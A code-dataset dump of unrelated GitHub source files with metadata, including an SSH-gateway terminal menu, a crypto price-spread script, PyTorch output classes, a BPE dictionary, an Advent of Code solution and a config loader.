Footer(urwid.AttrMap):\n def __init__(self, text):\n self.footer_text = urwid.Text(text, align='center')\n super(Footer, self).__init__(self.footer_text, 'foot')\n\n\nclass Search(urwid.Edit):\n def __init__(self):\n super(Search, self).__init__()\n\n def update_text(self, caption):\n self.set_caption(caption)\n\n def clear(self):\n self.set_edit_text(\"\")\n\n\nclass MenuItem(urwid.Text):\n def __init__(self, caption):\n self.caption = caption\n urwid.Text.__init__(self, self.caption)\n\n def keypress(self, size, key):\n return key\n\n def selectable(self):\n return True\n\n def get_caption(self):\n return str(self.caption)\n\n\nclass Window(object):\n \"\"\"\n Where all the Tui magic happens,\n handles creating urwid widgets and\n user interactions\n \"\"\"\n\n def __init__(self, aker_core):\n self.aker = aker_core\n self.user = self.aker.user\n self.current_hostgroup = \"\"\n self.set_palette()\n\n def set_palette(self):\n self.palette = [\n ('body', 'black', 'light gray'), # Normal Text\n ('focus', 'light green', 'black', 'standout'), # Focus\n ('head', 'white', 'dark gray', 'standout'), # Header\n ('foot', 'light gray', 'dark gray'), # Footer Separator\n ('key', 'light green', 'dark gray', 'bold'),\n ('title', 'white', 'black', 'bold'),\n ('popup', 'white', 'dark red'),\n ('msg', 'yellow', 'dark gray'),\n ('SSH', 'dark blue', 'light gray', 'underline'),\n ('SSH_focus', 'light green', 'dark blue', 'standout')] # Focus\n\n def draw(self):\n self.header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \"]\n\n self.footer_text = [\n ('msg', \"Move:\"),\n ('key', \"Up\"), \",\",\n ('key', \"Down\"), \",\",\n ('key', \"Left\"), \",\",\n ('key', \"Right\"), \",\",\n ('key', \"PgUp\"), \",\",\n ('key', \"PgDn\"), \",\",\n ('msg', \"Select:\"),\n ('key', \"Enter\"), \" \",\n ('msg', \"Refresh:\"),\n ('key', \"F5\"), \" \",\n ('msg', \"Quit:\"),\n ('key', \"F9\"), \" \",\n ('msg', \"By:\"),\n ('key', \"Ahmed Nazmy\")]\n\n # Define widgets\n self.header = Header(self.header_text)\n self.footer = Footer(self.footer_text)\n self.hostgrouplist = HostGroupList(list(self.user.hostgroups.keys()))\n self.hostlist = HostList(list(self.user.allowed_ssh_hosts.keys()))\n self.topframe = urwid.Frame(\n self.hostgrouplist.get_box(),\n header=self.header,\n footer=self.footer)\n self.screen = urwid.raw_display.Screen()\n\n # Register signals\n urwid.register_signal(HostList, ['connect'])\n urwid.register_signal(HostGroupList, ['group_chosen'])\n\n # Connect signals\n urwid.connect_signal(\n self.hostgrouplist.search,\n 'change',\n self.group_search_handler)\n urwid.connect_signal(\n self.hostgrouplist,\n 'group_chosen',\n self.group_chosen_handler)\n urwid.connect_signal(\n self.hostlist.search,\n 'change',\n self.host_search_handler)\n urwid.connect_signal(\n self.hostlist,\n 'connect',\n self.host_chosen_handler)\n\n self.loop = urwid.MainLoop(\n self.topframe,\n palette=self.palette,\n unhandled_input=self._input_handler,\n screen=self.screen,\n pop_ups=True)\n\n def _input_handler(self, key):\n if not urwid.is_mouse_event(key):\n if key == 'f5':\n self.update_lists()\n elif key == 'f9':\n logging.info(\n \"TUI: User {0} logging out of Aker\".format(\n self.user.name))\n raise urwid.ExitMainLoop()\n elif key == 'left':\n # For now if its not hostgroup window left should bring it up\n if self.topframe.get_body() != self.hostgrouplist.get_box():\n self.current_hostgroup = \"\"\n self.hostlist.empty()\n self.header.update_text(self.header_text)\n self.topframe.set_body(self.hostgrouplist.get_box())\n else:\n logging.debug(\n \"TUI: User {0} unhandled input : {1}\".format(\n self.user.name, key))\n\n def group_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Group search handler called with text {0}\".format(search_text))\n matchinghostgroups = []\n for hostgroup in self.user.hostgroups.keys():\n if search_text in hostgroup:\n logging.debug(\n \"TUI: hostgroup {1} matches search text {0}\".format(\n search_text, hostgroup))\n matchinghostgroups.append(hostgroup)\n self.hostgrouplist.updatelist(matchinghostgroups)\n\n def host_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Host search handler called with text {0}\".format(search_text))\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n if search_text in host:\n logging.debug(\n \"TUI: host {1} matches search text {0}\".format(\n search_text, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n\n def group_chosen_handler(self, hostgroup):\n logging.debug(\n \"TUI: user %s chose hostgroup %s \" %\n (self.user.name, hostgroup))\n self.current_hostgroup = hostgroup\n self.hostlist.empty()\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n logging.debug(\n \"TUI: host {1} is in hostgroup {0}, adding\".format(\n hostgroup, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \",\n ('msg', \"HostGroup:\"),\n ('key', \"%s\" % self.current_hostgroup)]\n self.header.update_text(header_text)\n self.topframe.set_body(self.hostlist.get_box())\n\n def host_chosen_handler(self, choice):\n host = choice\n logging.debug(\"TUI: user %s chose server %s \" % (self.user.name, host))\n self.aker.init_connection(self.user.allowed_ssh_hosts[host])\n\n def update_lists(self):\n logging.info(\n \"TUI: Refreshing entries for user {0}\".format(\n self.aker.user.name))\n self.aker.user.refresh_allowed_hosts(False)\n self.hostgrouplist.empty()\n for hostgroup in self.user.hostgroups.keys():\n self.hostgrouplist.add_item(hostgroup)\n if self.current_hostgroup != \"\":\n self.hostlist.empty()\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n self.hostlist.add_item(host)\n self.header.popup_message(\"Entries Refreshed\")\n\n def start(self):\n logging.debug(\"TUI: tui started\")\n self.loop.run()\n\n def stop(self):\n logging.debug(u\"TUI: tui stopped\")\n raise urwid.ExitMainLoop()\n\n def pause(self):\n logging.debug(\"TUI: tui paused\")\n self.loop.screen.stop()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n\n def restore(self):\n logging.debug(\"TUI restored\")\n self.loop.screen.start()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n", "repo_name": "aker-gateway/Aker", "sub_path": "tui.py", "file_name": "tui.py", "file_ext": "py", "file_size_in_byte": 12044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 562, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urwid.ListBox", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urwid.AttrMap", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 30, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrWrap", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 67, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 99, "usage_type": "call"}, {"api_name": "urwid.Columns", "line_number": 114, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 117, "usage_type": "call"}, {"api_name": "popup.SimplePopupLauncher", "line_number": 118, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 119, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 120, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 129, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 136, "usage_type": "call"}, {"api_name": "urwid.Edit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 151, "usage_type": "attribute"}, {"api_name": "urwid.Text.__init__", "line_number": 154, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 154, "usage_type": "attribute"}, {"api_name": "urwid.Frame", "line_number": 220, "usage_type": "call"}, {"api_name": "urwid.raw_display.Screen", "line_number": 224, "usage_type": "call"}, {"api_name": "urwid.raw_display", "line_number": 224, "usage_type": "attribute"}, {"api_name": "urwid.register_signal", "line_number": 227, "usage_type": "call"}, {"api_name": "urwid.register_signal", "line_number": 228, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 231, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 235, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 239, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 243, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 248, "usage_type": "call"}, {"api_name": "urwid.is_mouse_event", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 272, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 282, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 308, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 324, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 346, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 347, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 350, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 352, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 352, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 355, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 357, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 357, "usage_type": "attribute"}]}
+{"seq_id": "38688017056", "text": "import time\nfrom prettytable import PrettyTable\n\nfrom coin_price import get_coin_price, get_p2p_price\nfrom check_prices import check_prices\nfrom table import create_table\n\nsumma = 5000\n\nstart = time.time()\n\np2pUSDTbuy = get_p2p_price('USDT', 'BUY', summa)\np2pBTCbuy = get_p2p_price('BTC', 'BUY', summa)\np2pBUSDbuy = get_p2p_price('BUSD', 'BUY', summa)\np2pBNBbuy = get_p2p_price('BNB', 'BUY', summa)\np2pETHbuy = get_p2p_price('ETH', 'BUY', summa)\np2pRUBbuy = get_p2p_price('RUB', 'BUY', summa)\n# p2pSHIBbuy = get_p2p_price('SHIB', 'BUY', summa)\n\np2pUSDTsell = get_p2p_price('USDT', 'SELL', summa)\np2pBTCsell = get_p2p_price('BTC', 'SELL', summa)\np2pBUSDsell = get_p2p_price('BUSD', 'SELL', summa)\np2pBNBsell = get_p2p_price('BNB', 'SELL', summa)\np2pETHsell = get_p2p_price('ETH', 'SELL', summa)\np2pRUBsell = get_p2p_price('RUB', 'SELL', summa)\n# p2pSHIBsell = get_p2p_price('SHIB', 'SELL', summa)\n\nspotUSDT = get_coin_price('USDT', 'RUB')\nspotBTC = get_coin_price('BTC', 'RUB')\nspotBUSD = get_coin_price('BUSD', 'RUB')\nspotBNB = get_coin_price('BNB', 'RUB')\nspotETH = get_coin_price('ETH', 'RUB')\n# spotSHIB = get_coin_price('SHIB', 'rub')\n\nth = ['COIN', '% input', 'p2p BUY', 'spot cost', 'p2p SELL', '% output']\ntd = [\n 'USDT', (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, p2pUSDTbuy, spotUSDT, p2pUSDTsell,\n (p2pUSDTsell - spotUSDT) / spotUSDT * 100,\n 'BTC', (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100, p2pBTCbuy, spotBTC, p2pBTCsell,\n (p2pBTCsell - spotBTC) / spotBTC * 100,\n 'BUSD', (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, p2pBUSDbuy, spotBUSD, p2pBUSDsell,\n (p2pBUSDsell - spotBUSD) / spotBUSD * 100,\n 'BNB', (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100, p2pBNBbuy, spotBNB, p2pBNBsell,\n (p2pBNBsell - spotBNB) / spotBNB * 100,\n 'ETH', (spotETH - p2pETHbuy) / p2pETHbuy * 100, p2pETHbuy, spotETH, p2pETHsell,\n (p2pETHsell - spotETH) / spotETH * 100\n]\n\ncolumns = len(th)\n\ntable = PrettyTable(th)\n\ntd_data = td[:]\n\nwhile td_data:\n table.add_row(td_data[:columns])\n td_data = td_data[columns:]\n\nprint(table) # Печатаем таблицу\n\nend = time.time()\n\nprint(\"The time of execution of above program is :\",\n (end - start) * 10 ** 3 / 1000, \"sec\")\n\ncoins = ['usdt', 'btc', 'busd', 'bnb', 'eth']\ncoins_buy = {'usdt': p2pUSDTbuy, 'btc': p2pBTCbuy, 'busd': p2pBUSDbuy, 'bnb': p2pBNBbuy, 'eth': p2pETHbuy}\ncoins_sell = {'usdt': p2pUSDTsell, 'btc': p2pBTCsell, 'busd': p2pBUSDsell, 'bnb': p2pBNBsell, 'eth': p2pETHsell}\ncoins_persents = {'usdt': (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, 'btc': (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100,\n 'busd': (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, 'bnb': (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100,\n 'eth': (spotETH - p2pETHbuy) / p2pETHbuy * 100}\nfor i in coins:\n for j in coins:\n if j != i:\n st = 10000\n st /= coins_buy[i]\n st /= get_coin_price(i, j)\n st *= coins_sell[j]\n if 0 < (st - 10000) / 10000 < 10:\n print(i + '/' + j)\n print((st - 10000) / 10000 * 100)\n\nrubs_coins = ['ADA', 'ALGO', 'ARB', 'ARPA', 'BNB', 'BTC', 'BUSD', 'DOT', 'ETH', 'LTC', 'MATIC', 'NEAR', 'NEO', 'SOL',\n 'XRP']\nbest = max(coins_persents, key=coins_persents.get)\nprint(best)\nfor i in rubs_coins:\n try:\n st = 10000\n st /= coins_buy[best]\n st /= get_coin_price(i, best)\n st *= get_coin_price(i, 'rub')\n print(i)\n print((st - 10000) / 10000 * 100)\n except:\n pass\n", "repo_name": "dez1ros/find_p2p_spred_binance", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 12, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 13, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 14, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 15, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 16, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 17, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 20, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 21, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 22, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 23, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 24, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 25, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 28, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 29, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 30, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 31, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 32, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 51, "usage_type": "call"}, {"api_name": "table.add_row", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 77, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 91, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "71191851367", "text": "import torch\n\n# output classes for bi-encoder and mm-encoder account for flexibility in case of additional byol or data2vec outputs\n\nclass DispatcherOutput:\n def __init__(\n self,\n student_input, \n teacher_inputs, \n align_fuse, \n apply_mask: bool, \n labels: torch.Tensor, \n output_modalities: dict, \n metric: str, \n num_classes: int,\n ) -> None:\n self.student_input = student_input\n self.teacher_inputs = teacher_inputs\n self.align_fuse = align_fuse\n self.apply_mask = apply_mask\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ModelOutput:\n def __init__(\n self,\n pooler_output: torch.Tensor,\n last_hidden_state: torch.Tensor,\n hidden_states: torch.Tensor,\n attentions: torch.Tensor,\n cross_attentions: torch.Tensor \n ) -> None:\n self.pooler_output = pooler_output\n self.last_hidden_state = last_hidden_state\n self.hidden_states = hidden_states\n self.attentions = attentions\n self.cross_attentions = cross_attentions\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n \n \nclass CriterionOutput:\n def __init__(\n self,\n total_loss: torch.Tensor,\n latent_loss: torch.Tensor = None,\n align_loss: torch.Tensor = None,\n ) -> None:\n self.total_loss = total_loss\n self.latent_loss = latent_loss\n self.align_loss = align_loss\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ForwardPassOutput:\n def __init__(\n self,\n student_output: ModelOutput = None,\n teacher_output: ModelOutput = None,\n align_fuse: dict = None,\n labels: torch.Tensor = None,\n output_modalities: dict = None,\n metric: str = None,\n num_classes: int = None,\n criterion_output: CriterionOutput = None,\n ) -> None:\n self.student_output = student_output\n self.teacher_output = teacher_output\n self.align_fuse = align_fuse\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes,\n self.criterion_output = criterion_output\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n ", "repo_name": "marcomoldovan/multimodal-self-distillation", "sub_path": "src/models/components/outputs.py", "file_name": "outputs.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 73, "usage_type": "attribute"}]}
+{"seq_id": "29647903572", "text": "word = 'podaj slowo lub zdanie:'\ndict1 = dict()\n\nfor sign in word:\n dict1[sign] = dict1.get(sign, 0) + 1\n\nfor znak, ilosc in dict1.items():\n print(f'{znak} -> {ilosc}')\n\n\nfrom collections import defaultdict\nzliczenia = defaultdict(int)\nfor znak in word:\n zliczenia[znak] += 1\nprint(\"333: \", zliczenia)", "repo_name": "marcinszymura/python_kurs", "sub_path": "day3/zadanie_get_slownik.py", "file_name": "zadanie_get_slownik.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "35013439440", "text": "import requests\n\n# Specify the URL of the PDF file in the repository\npdf_url = \"https://drive.google.com/file/d/1CLl2OruM9oPscyjaBhXiUD-dfdDNYDII/view?usp=sharing\"\n\n# Send a GET request to download the PDF file\nresponse = requests.get(pdf_url)\n\n# Check if the request was successful\nif response.status_code == 200:\n # Access the PDF content\n pdf_content = response.content\n # Your code to work with the PDF content goes here\n # For example, you can save it to a local file or process it further\nelse:\n print(\"Failed to retrieve the PDF file.\")\n", "repo_name": "harithabeduduru/mounika", "sub_path": "intern.py", "file_name": "intern.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "40398157659", "text": "from typing import *\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.dictionary import Dictionary\nfrom ncc.data.retrieval.word_bpe_dictionary import WordBpeDicionary\n\n\nclass HybridRetrievalDictionary(object):\n \"\"\"Hybrid retrieval dictionary, composed of subtoken and bpe dictionaries\"\"\"\n\n def __init__(self, subtoken_dict=None, bpetoken_dict=None):\n self.subtoken_dict = subtoken_dict\n self._subtoken_len = 0 if self.subtoken_dict is None else len(self.subtoken_dict)\n self.bpetoken_dict = bpetoken_dict\n self._bpetoken_len = 0 if self.bpetoken_dict is None else len(self.bpetoken_dict)\n\n def __len__(self):\n return self._subtoken_len + self._bpetoken_len\n\n def __getitem__(self, idx):\n if idx < self.__len__():\n if idx < self._subtoken_len:\n return self.subtoken_dict.symbols[idx]\n elif idx < self._subtoken_len + self._bpetoken_len:\n return self.bpetoken_dict.symbols[idx - self._bpetoken_len]\n return constants.UNK\n\n def __eq__(self, other):\n return (self.subtoken_dict is not None and self.subtoken_dict.indices == other.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and self.bpetoken_dict.indices == other.bpetoken_dict.indices)\n\n def __contains__(self, sym):\n return (self.subtoken_dict is not None and sym in self.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and sym in self.bpetoken_dict.indices)\n\n def unk(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk()\n else:\n return None\n\n @property\n def unk_word(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk_word\n else:\n return None\n\n def pad(self):\n if self.subtoken_dict:\n return self.subtoken_dict.pad()\n else:\n return None\n\n def eow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.eow()\n else:\n return None\n\n def sow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.sow()\n else:\n return None\n\n @classmethod\n def load(cls, f):\n subtoken_dict = Dictionary.load(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n bpetoken_dict = WordBpeDicionary.load(bpe_f)\n return cls(subtoken_dict, bpetoken_dict)\n\n def save(self, f):\n self.subtoken_dict.save(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n self.bpetoken_dict.save(bpe_f)\n\n def index(self, word):\n if word in self.subtoken_dict:\n subtokens = [word]\n else:\n subtokens = self.bpe_tokenize(word)\n subtoken_ids = []\n for token in subtokens:\n if token in self.subtoken_dict:\n subtoken_ids.append(self.subtoken_dict.index(token))\n elif token in self.bpetoken_dict:\n subtoken_ids.append(self.bpetoken_dict.index(token) + self._subtoken_len)\n else:\n subtoken_ids.append(self.subtoken_dict.unk())\n return subtoken_ids\n\n def encode_line(\n self,\n line,\n line_tokenizer,\n func_name,\n **kwargs\n ):\n words = line_tokenizer(line, func_name=func_name, min_func_len=kwargs.get('min_func_len', None)) \\\n if line_tokenizer is not None else line\n ids = []\n for i, word in enumerate(words):\n idx = self.index(word)\n ids.extend(idx)\n ids = torch.Tensor(ids).long()\n return ids\n\n def bpe_tokenize(self, word: str) -> List[str]:\n \"\"\" Tokenizes inside an unknown token using BPE \"\"\"\n end_idx = min([len(word), self.bpetoken_dict.ngram_max])\n sw_tokens = [self.bpetoken_dict.sow_word]\n start_idx = 0\n\n while start_idx < len(word):\n subword = word[start_idx:end_idx]\n if subword in self.bpetoken_dict:\n sw_tokens.append(subword)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n elif len(subword) == 1:\n sw_tokens.append(self.bpetoken_dict.unk_word)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n else:\n end_idx -= 1\n\n sw_tokens.append(self.bpetoken_dict.eow_word)\n return sw_tokens\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/data/retrieval/hybrid/hybrid_retrieval_dictionary.py", "file_name": "hybrid_retrieval_dictionary.py", "file_ext": "py", "file_size_in_byte": 4658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.data.constants.UNK", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.data.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "ncc.data.dictionary.Dictionary.load", "line_number": 71, "usage_type": "call"}, {"api_name": "ncc.data.dictionary.Dictionary", "line_number": 71, "usage_type": "name"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary.load", "line_number": 74, "usage_type": "call"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "252430878", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 08 2017\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nimport operator as o\n\nregs = dd(int)\n\noperators = {\n \">\": o.gt,\n \"<\": o.lt,\n \"==\": o.eq,\n \">=\": o.ge,\n \"<=\": o.le,\n \"!=\": o.ne\n}\n\nmaxes = []\n\ndef parseInst(instruction):\n oper, condition = instruction.split(' if ')\n target, operator, t_val = condition.split()\n reg, cmd, val = oper.split()\n return (reg, cmd, int(val),target, operator, int(t_val))\n\ndef command(reg, cmd, val):\n if cmd == \"inc\":\n regs[reg] += val\n else:\n regs[reg] -= val\n maxes.append(regs[reg])\n\nfor inst in data:\n reg, cmd, val, target, op, t_val = parseInst(inst)\n if operators[op](regs[target], t_val):\n command(reg, cmd, val)\n\nprint(max(regs.values()))\nprint(max(maxes))\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2017/08/day08.py", "file_name": "day08.py", "file_ext": "py", "file_size_in_byte": 952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "operator.gt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 24, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 25, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 26, "usage_type": "attribute"}]}
+{"seq_id": "14711535962", "text": "import os\n\nimport dotenv\n\ndotenv.load_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.debug_mode = False\n self.openai_api_key = os.getenv(\"OPENAI_API_KEY\", \"\")\n self.node_red_server = os.getenv(\"NODE_RED_SERVER\", \"\")\n self.fast_llm_model = os.getenv(\"FAST_LLM_MODEL\", \"gpt-3.5-turbo\")\n self.smart_llm_model = os.getenv(\"SMART_LLM_MODEL\", \"gpt-4\")\n self.temperature = float(os.getenv(\"TEMPERATURE\", \"1\"))\n\n assert self.openai_api_key != \"\", \"OpenAI API key not found\"\n", "repo_name": "viact-ai/automate_chatgpt_nodered", "sub_path": "utils/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}]}
